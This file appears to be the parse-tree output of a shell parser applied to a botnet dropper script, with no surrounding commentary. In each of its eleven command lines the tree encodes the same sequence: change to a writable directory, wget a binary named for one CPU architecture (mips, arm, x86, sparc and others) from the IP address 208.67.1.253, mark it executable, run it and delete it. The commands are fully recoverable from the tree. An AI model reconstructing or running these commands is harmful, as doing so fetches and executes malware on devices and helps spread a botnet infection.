ListNode(lineno=2, pos=(12, 159), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 37), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 37), word='/var/system'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(38, 40)),
  CommandNode(lineno=2, pos=(41, 48), parts=[
    WordNode(lineno=2, pos=(41, 43), word='cd'),
    WordNode(lineno=2, pos=(44, 48), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(49, 51)),
  CommandNode(lineno=2, pos=(52, 60), parts=[
    WordNode(lineno=2, pos=(52, 54), word='cd'),
    WordNode(lineno=2, pos=(55, 60), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(61, 63)),
  CommandNode(lineno=2, pos=(64, 68), parts=[
    WordNode(lineno=2, pos=(64, 66), word='cd'),
    WordNode(lineno=2, pos=(67, 68), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(68, 69)),
  CommandNode(lineno=2, pos=(70, 105), parts=[
    WordNode(lineno=2, pos=(70, 74), word='wget'),
    WordNode(lineno=2, pos=(75, 105), word='http://208.67.1.253/jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(105, 106)),
  CommandNode(lineno=2, pos=(107, 126), parts=[
    WordNode(lineno=2, pos=(107, 112), word='chmod'),
    WordNode(lineno=2, pos=(113, 115), word='+x'),
    WordNode(lineno=2, pos=(116, 126), word='jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(126, 127)),
  CommandNode(lineno=2, pos=(128, 140), parts=[
    WordNode(lineno=2, pos=(128, 140), word='./jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(140, 141)),
  CommandNode(lineno=2, pos=(142, 159), parts=[
    WordNode(lineno=2, pos=(142, 144), word='rm'),
    WordNode(lineno=2, pos=(145, 148), word='-rf'),
    WordNode(lineno=2, pos=(149, 159), word='jackmymips'),
  ]),
])
ListNode(lineno=3, pos=(160, 315), parts=[
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 185), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 185), word='/var/system'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(186, 188)),
  CommandNode(lineno=3, pos=(189, 196), parts=[
    WordNode(lineno=3, pos=(189, 191), word='cd'),
    WordNode(lineno=3, pos=(192, 196), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 208), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 208), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(209, 211)),
  CommandNode(lineno=3, pos=(212, 216), parts=[
    WordNode(lineno=3, pos=(212, 214), word='cd'),
    WordNode(lineno=3, pos=(215, 216), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(216, 217)),
  CommandNode(lineno=3, pos=(218, 255), parts=[
    WordNode(lineno=3, pos=(218, 222), word='wget'),
    WordNode(lineno=3, pos=(223, 255), word='http://208.67.1.253/jackmymipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(255, 256)),
  CommandNode(lineno=3, pos=(257, 278), parts=[
    WordNode(lineno=3, pos=(257, 262), word='chmod'),
    WordNode(lineno=3, pos=(263, 265), word='+x'),
    WordNode(lineno=3, pos=(266, 278), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(278, 279)),
  CommandNode(lineno=3, pos=(280, 294), parts=[
    WordNode(lineno=3, pos=(280, 294), word='./jackmymipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(294, 295)),
  CommandNode(lineno=3, pos=(296, 315), parts=[
    WordNode(lineno=3, pos=(296, 298), word='rm'),
    WordNode(lineno=3, pos=(299, 302), word='-rf'),
    WordNode(lineno=3, pos=(303, 315), word='jackmymipsel'),
  ]),
])
ListNode(lineno=4, pos=(316, 459), parts=[
  CommandNode(lineno=4, pos=(316, 323), parts=[
    WordNode(lineno=4, pos=(316, 318), word='cd'),
    WordNode(lineno=4, pos=(319, 323), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(324, 326)),
  CommandNode(lineno=4, pos=(327, 341), parts=[
    WordNode(lineno=4, pos=(327, 329), word='cd'),
    WordNode(lineno=4, pos=(330, 341), word='/var/system'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(342, 344)),
  CommandNode(lineno=4, pos=(345, 352), parts=[
    WordNode(lineno=4, pos=(345, 347), word='cd'),
    WordNode(lineno=4, pos=(348, 352), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(353, 355)),
  CommandNode(lineno=4, pos=(356, 364), parts=[
    WordNode(lineno=4, pos=(356, 358), word='cd'),
    WordNode(lineno=4, pos=(359, 364), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(365, 367)),
  CommandNode(lineno=4, pos=(368, 372), parts=[
    WordNode(lineno=4, pos=(368, 370), word='cd'),
    WordNode(lineno=4, pos=(371, 372), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(372, 373)),
  CommandNode(lineno=4, pos=(374, 408), parts=[
    WordNode(lineno=4, pos=(374, 378), word='wget'),
    WordNode(lineno=4, pos=(379, 408), word='http://208.67.1.253/jackmysh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(408, 409)),
  CommandNode(lineno=4, pos=(410, 428), parts=[
    WordNode(lineno=4, pos=(410, 415), word='chmod'),
    WordNode(lineno=4, pos=(416, 418), word='+x'),
    WordNode(lineno=4, pos=(419, 428), word='jackmysh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(428, 429)),
  CommandNode(lineno=4, pos=(430, 441), parts=[
    WordNode(lineno=4, pos=(430, 441), word='./jackmysh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(441, 442)),
  CommandNode(lineno=4, pos=(443, 459), parts=[
    WordNode(lineno=4, pos=(443, 445), word='rm'),
    WordNode(lineno=4, pos=(446, 449), word='-rf'),
    WordNode(lineno=4, pos=(450, 459), word='jackmysh4'),
  ]),
])
ListNode(lineno=5, pos=(460, 603), parts=[
  CommandNode(lineno=5, pos=(460, 467), parts=[
    WordNode(lineno=5, pos=(460, 462), word='cd'),
    WordNode(lineno=5, pos=(463, 467), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(468, 470)),
  CommandNode(lineno=5, pos=(471, 485), parts=[
    WordNode(lineno=5, pos=(471, 473), word='cd'),
    WordNode(lineno=5, pos=(474, 485), word='/var/system'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(486, 488)),
  CommandNode(lineno=5, pos=(489, 496), parts=[
    WordNode(lineno=5, pos=(489, 491), word='cd'),
    WordNode(lineno=5, pos=(492, 496), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(497, 499)),
  CommandNode(lineno=5, pos=(500, 508), parts=[
    WordNode(lineno=5, pos=(500, 502), word='cd'),
    WordNode(lineno=5, pos=(503, 508), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(509, 511)),
  CommandNode(lineno=5, pos=(512, 516), parts=[
    WordNode(lineno=5, pos=(512, 514), word='cd'),
    WordNode(lineno=5, pos=(515, 516), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(516, 517)),
  CommandNode(lineno=5, pos=(518, 552), parts=[
    WordNode(lineno=5, pos=(518, 522), word='wget'),
    WordNode(lineno=5, pos=(523, 552), word='http://208.67.1.253/jackmyx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(552, 553)),
  CommandNode(lineno=5, pos=(554, 572), parts=[
    WordNode(lineno=5, pos=(554, 559), word='chmod'),
    WordNode(lineno=5, pos=(560, 562), word='+x'),
    WordNode(lineno=5, pos=(563, 572), word='jackmyx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(572, 573)),
  CommandNode(lineno=5, pos=(574, 585), parts=[
    WordNode(lineno=5, pos=(574, 585), word='./jackmyx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(585, 586)),
  CommandNode(lineno=5, pos=(587, 603), parts=[
    WordNode(lineno=5, pos=(587, 589), word='rm'),
    WordNode(lineno=5, pos=(590, 593), word='-rf'),
    WordNode(lineno=5, pos=(594, 603), word='jackmyx86'),
  ]),
])
ListNode(lineno=6, pos=(604, 751), parts=[
  CommandNode(lineno=6, pos=(604, 611), parts=[
    WordNode(lineno=6, pos=(604, 606), word='cd'),
    WordNode(lineno=6, pos=(607, 611), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(612, 614)),
  CommandNode(lineno=6, pos=(615, 629), parts=[
    WordNode(lineno=6, pos=(615, 617), word='cd'),
    WordNode(lineno=6, pos=(618, 629), word='/var/system'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(630, 632)),
  CommandNode(lineno=6, pos=(633, 640), parts=[
    WordNode(lineno=6, pos=(633, 635), word='cd'),
    WordNode(lineno=6, pos=(636, 640), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(641, 643)),
  CommandNode(lineno=6, pos=(644, 652), parts=[
    WordNode(lineno=6, pos=(644, 646), word='cd'),
    WordNode(lineno=6, pos=(647, 652), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(653, 655)),
  CommandNode(lineno=6, pos=(656, 660), parts=[
    WordNode(lineno=6, pos=(656, 658), word='cd'),
    WordNode(lineno=6, pos=(659, 660), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(660, 661)),
  CommandNode(lineno=6, pos=(662, 697), parts=[
    WordNode(lineno=6, pos=(662, 666), word='wget'),
    WordNode(lineno=6, pos=(667, 697), word='http://208.67.1.253/jackmyi586'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(697, 698)),
  CommandNode(lineno=6, pos=(699, 718), parts=[
    WordNode(lineno=6, pos=(699, 704), word='chmod'),
    WordNode(lineno=6, pos=(705, 707), word='+x'),
    WordNode(lineno=6, pos=(708, 718), word='jackmyi586'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(718, 719)),
  CommandNode(lineno=6, pos=(720, 732), parts=[
    WordNode(lineno=6, pos=(720, 732), word='./jackmyi586'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(732, 733)),
  CommandNode(lineno=6, pos=(734, 751), parts=[
    WordNode(lineno=6, pos=(734, 736), word='rm'),
    WordNode(lineno=6, pos=(737, 740), word='-rf'),
    WordNode(lineno=6, pos=(741, 751), word='jackmyi586'),
  ]),
])
ListNode(lineno=7, pos=(752, 911), parts=[
  CommandNode(lineno=7, pos=(752, 759), parts=[
    WordNode(lineno=7, pos=(752, 754), word='cd'),
    WordNode(lineno=7, pos=(755, 759), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(760, 762)),
  CommandNode(lineno=7, pos=(763, 777), parts=[
    WordNode(lineno=7, pos=(763, 765), word='cd'),
    WordNode(lineno=7, pos=(766, 777), word='/var/system'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(778, 780)),
  CommandNode(lineno=7, pos=(781, 788), parts=[
    WordNode(lineno=7, pos=(781, 783), word='cd'),
    WordNode(lineno=7, pos=(784, 788), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(789, 791)),
  CommandNode(lineno=7, pos=(792, 800), parts=[
    WordNode(lineno=7, pos=(792, 794), word='cd'),
    WordNode(lineno=7, pos=(795, 800), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(801, 803)),
  CommandNode(lineno=7, pos=(804, 808), parts=[
    WordNode(lineno=7, pos=(804, 806), word='cd'),
    WordNode(lineno=7, pos=(807, 808), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(808, 809)),
  CommandNode(lineno=7, pos=(810, 848), parts=[
    WordNode(lineno=7, pos=(810, 814), word='wget'),
    WordNode(lineno=7, pos=(815, 848), word='http://208.67.1.253/jackmypowerpc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(848, 849)),
  CommandNode(lineno=7, pos=(850, 872), parts=[
    WordNode(lineno=7, pos=(850, 855), word='chmod'),
    WordNode(lineno=7, pos=(856, 858), word='+x'),
    WordNode(lineno=7, pos=(859, 872), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(872, 873)),
  CommandNode(lineno=7, pos=(874, 889), parts=[
    WordNode(lineno=7, pos=(874, 889), word='./jackmypowerpc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(889, 890)),
  CommandNode(lineno=7, pos=(891, 911), parts=[
    WordNode(lineno=7, pos=(891, 893), word='rm'),
    WordNode(lineno=7, pos=(894, 897), word='-rf'),
    WordNode(lineno=7, pos=(898, 911), word='jackmypowerpc'),
  ]),
])
ListNode(lineno=8, pos=(912, 1091), parts=[
  CommandNode(lineno=8, pos=(912, 919), parts=[
    WordNode(lineno=8, pos=(912, 914), word='cd'),
    WordNode(lineno=8, pos=(915, 919), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(920, 922)),
  CommandNode(lineno=8, pos=(923, 937), parts=[
    WordNode(lineno=8, pos=(923, 925), word='cd'),
    WordNode(lineno=8, pos=(926, 937), word='/var/system'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(938, 940)),
  CommandNode(lineno=8, pos=(941, 948), parts=[
    WordNode(lineno=8, pos=(941, 943), word='cd'),
    WordNode(lineno=8, pos=(944, 948), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(949, 951)),
  CommandNode(lineno=8, pos=(952, 960), parts=[
    WordNode(lineno=8, pos=(952, 954), word='cd'),
    WordNode(lineno=8, pos=(955, 960), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(961, 963)),
  CommandNode(lineno=8, pos=(964, 968), parts=[
    WordNode(lineno=8, pos=(964, 966), word='cd'),
    WordNode(lineno=8, pos=(967, 968), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(968, 969)),
  CommandNode(lineno=8, pos=(970, 1013), parts=[
    WordNode(lineno=8, pos=(970, 974), word='wget'),
    WordNode(lineno=8, pos=(975, 1013), word='http://208.67.1.253/jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1013, 1014)),
  CommandNode(lineno=8, pos=(1015, 1042), parts=[
    WordNode(lineno=8, pos=(1015, 1020), word='chmod'),
    WordNode(lineno=8, pos=(1021, 1023), word='+x'),
    WordNode(lineno=8, pos=(1024, 1042), word='jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1042, 1043)),
  CommandNode(lineno=8, pos=(1044, 1064), parts=[
    WordNode(lineno=8, pos=(1044, 1064), word='./jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1064, 1065)),
  CommandNode(lineno=8, pos=(1066, 1091), parts=[
    WordNode(lineno=8, pos=(1066, 1068), word='rm'),
    WordNode(lineno=8, pos=(1069, 1072), word='-rf'),
    WordNode(lineno=8, pos=(1073, 1091), word='jackmypowerpc440fp'),
  ]),
])
ListNode(lineno=9, pos=(1092, 1239), parts=[
  CommandNode(lineno=9, pos=(1092, 1099), parts=[
    WordNode(lineno=9, pos=(1092, 1094), word='cd'),
    WordNode(lineno=9, pos=(1095, 1099), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1100, 1102)),
  CommandNode(lineno=9, pos=(1103, 1117), parts=[
    WordNode(lineno=9, pos=(1103, 1105), word='cd'),
    WordNode(lineno=9, pos=(1106, 1117), word='/var/system'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1118, 1120)),
  CommandNode(lineno=9, pos=(1121, 1128), parts=[
    WordNode(lineno=9, pos=(1121, 1123), word='cd'),
    WordNode(lineno=9, pos=(1124, 1128), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1129, 1131)),
  CommandNode(lineno=9, pos=(1132, 1140), parts=[
    WordNode(lineno=9, pos=(1132, 1134), word='cd'),
    WordNode(lineno=9, pos=(1135, 1140), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1141, 1143)),
  CommandNode(lineno=9, pos=(1144, 1148), parts=[
    WordNode(lineno=9, pos=(1144, 1146), word='cd'),
    WordNode(lineno=9, pos=(1147, 1148), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1148, 1149)),
  CommandNode(lineno=9, pos=(1150, 1185), parts=[
    WordNode(lineno=9, pos=(1150, 1154), word='wget'),
    WordNode(lineno=9, pos=(1155, 1185), word='http://208.67.1.253/jackmym86k'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1185, 1186)),
  CommandNode(lineno=9, pos=(1187, 1206), parts=[
    WordNode(lineno=9, pos=(1187, 1192), word='chmod'),
    WordNode(lineno=9, pos=(1193, 1195), word='+x'),
    WordNode(lineno=9, pos=(1196, 1206), word='jackmym86k'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1206, 1207)),
  CommandNode(lineno=9, pos=(1208, 1220), parts=[
    WordNode(lineno=9, pos=(1208, 1220), word='./jackmym86k'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1220, 1221)),
  CommandNode(lineno=9, pos=(1222, 1239), parts=[
    WordNode(lineno=9, pos=(1222, 1224), word='rm'),
    WordNode(lineno=9, pos=(1225, 1228), word='-rf'),
    WordNode(lineno=9, pos=(1229, 1239), word='jackmym86k'),
  ]),
])
ListNode(lineno=10, pos=(1240, 1391), parts=[
  CommandNode(lineno=10, pos=(1240, 1247), parts=[
    WordNode(lineno=10, pos=(1240, 1242), word='cd'),
    WordNode(lineno=10, pos=(1243, 1247), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1248, 1250)),
  CommandNode(lineno=10, pos=(1251, 1265), parts=[
    WordNode(lineno=10, pos=(1251, 1253), word='cd'),
    WordNode(lineno=10, pos=(1254, 1265), word='/var/system'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1266, 1268)),
  CommandNode(lineno=10, pos=(1269, 1276), parts=[
    WordNode(lineno=10, pos=(1269, 1271), word='cd'),
    WordNode(lineno=10, pos=(1272, 1276), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1277, 1279)),
  CommandNode(lineno=10, pos=(1280, 1288), parts=[
    WordNode(lineno=10, pos=(1280, 1282), word='cd'),
    WordNode(lineno=10, pos=(1283, 1288), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1289, 1291)),
  CommandNode(lineno=10, pos=(1292, 1296), parts=[
    WordNode(lineno=10, pos=(1292, 1294), word='cd'),
    WordNode(lineno=10, pos=(1295, 1296), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1296, 1297)),
  CommandNode(lineno=10, pos=(1298, 1334), parts=[
    WordNode(lineno=10, pos=(1298, 1302), word='wget'),
    WordNode(lineno=10, pos=(1303, 1334), word='http://208.67.1.253/jackmysparc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1334, 1335)),
  CommandNode(lineno=10, pos=(1336, 1356), parts=[
    WordNode(lineno=10, pos=(1336, 1341), word='chmod'),
    WordNode(lineno=10, pos=(1342, 1344), word='+x'),
    WordNode(lineno=10, pos=(1345, 1356), word='jackmysparc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1356, 1357)),
  CommandNode(lineno=10, pos=(1358, 1371), parts=[
    WordNode(lineno=10, pos=(1358, 1371), word='./jackmysparc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1371, 1372)),
  CommandNode(lineno=10, pos=(1373, 1391), parts=[
    WordNode(lineno=10, pos=(1373, 1375), word='rm'),
    WordNode(lineno=10, pos=(1376, 1379), word='-rf'),
    WordNode(lineno=10, pos=(1380, 1391), word='jackmysparc'),
  ]),
])
ListNode(lineno=11, pos=(1392, 1543), parts=[
  CommandNode(lineno=11, pos=(1392, 1399), parts=[
    WordNode(lineno=11, pos=(1392, 1394), word='cd'),
    WordNode(lineno=11, pos=(1395, 1399), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1400, 1402)),
  CommandNode(lineno=11, pos=(1403, 1417), parts=[
    WordNode(lineno=11, pos=(1403, 1405), word='cd'),
    WordNode(lineno=11, pos=(1406, 1417), word='/var/system'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1418, 1420)),
  CommandNode(lineno=11, pos=(1421, 1428), parts=[
    WordNode(lineno=11, pos=(1421, 1423), word='cd'),
    WordNode(lineno=11, pos=(1424, 1428), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1429, 1431)),
  CommandNode(lineno=11, pos=(1432, 1440), parts=[
    WordNode(lineno=11, pos=(1432, 1434), word='cd'),
    WordNode(lineno=11, pos=(1435, 1440), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1441, 1443)),
  CommandNode(lineno=11, pos=(1444, 1448), parts=[
    WordNode(lineno=11, pos=(1444, 1446), word='cd'),
    WordNode(lineno=11, pos=(1447, 1448), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1448, 1449)),
  CommandNode(lineno=11, pos=(1450, 1486), parts=[
    WordNode(lineno=11, pos=(1450, 1454), word='wget'),
    WordNode(lineno=11, pos=(1455, 1486), word='http://208.67.1.253/jackmyarmv4'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1486, 1487)),
  CommandNode(lineno=11, pos=(1488, 1508), parts=[
    WordNode(lineno=11, pos=(1488, 1493), word='chmod'),
    WordNode(lineno=11, pos=(1494, 1496), word='+x'),
    WordNode(lineno=11, pos=(1497, 1508), word='jackmyarmv4'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1508, 1509)),
  CommandNode(lineno=11, pos=(1510, 1523), parts=[
    WordNode(lineno=11, pos=(1510, 1523), word='./jackmyarmv4'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1523, 1524)),
  CommandNode(lineno=11, pos=(1525, 1543), parts=[
    WordNode(lineno=11, pos=(1525, 1527), word='rm'),
    WordNode(lineno=11, pos=(1528, 1531), word='-rf'),
    WordNode(lineno=11, pos=(1532, 1543), word='jackmyarmv4'),
  ]),
])
ListNode(lineno=12, pos=(1544, 1695), parts=[
  CommandNode(lineno=12, pos=(1544, 1551), parts=[
    WordNode(lineno=12, pos=(1544, 1546), word='cd'),
    WordNode(lineno=12, pos=(1547, 1551), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1552, 1554)),
  CommandNode(lineno=12, pos=(1555, 1569), parts=[
    WordNode(lineno=12, pos=(1555, 1557), word='cd'),
    WordNode(lineno=12, pos=(1558, 1569), word='/var/system'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1570, 1572)),
  CommandNode(lineno=12, pos=(1573, 1580), parts=[
    WordNode(lineno=12, pos=(1573, 1575), word='cd'),
    WordNode(lineno=12, pos=(1576, 1580), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1581, 1583)),
  CommandNode(lineno=12, pos=(1584, 1592), parts=[
    WordNode(lineno=12, pos=(1584, 1586), word='cd'),
    WordNode(lineno=12, pos=(1587, 1592), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1593, 1595)),
  CommandNode(lineno=12, pos=(1596, 1600), parts=[
    WordNode(lineno=12, pos=(1596, 1598), word='cd'),
    WordNode(lineno=12, pos=(1599, 1600), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1600, 1601)),
  CommandNode(lineno=12, pos=(1602, 1638), parts=[
    WordNode(lineno=12, pos=(1602, 1606), word='wget'),
    WordNode(lineno=12, pos=(1607, 1638), word='http://208.67.1.253/jackmyarmv5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1638, 1639)),
  CommandNode(lineno=12, pos=(1640, 1660), parts=[
    WordNode(lineno=12, pos=(1640, 1645), word='chmod'),
    WordNode(lineno=12, pos=(1646, 1648), word='+x'),
    WordNode(lineno=12, pos=(1649, 1660), word='jackmyarmv5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1660, 1661)),
  CommandNode(lineno=12, pos=(1662, 1675), parts=[
    WordNode(lineno=12, pos=(1662, 1675), word='./jackmyarmv5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1675, 1676)),
  CommandNode(lineno=12, pos=(1677, 1695), parts=[
    WordNode(lineno=12, pos=(1677, 1679), word='rm'),
    WordNode(lineno=12, pos=(1680, 1683), word='-rf'),
    WordNode(lineno=12, pos=(1684, 1695), word='jackmyarmv5'),
  ]),
])
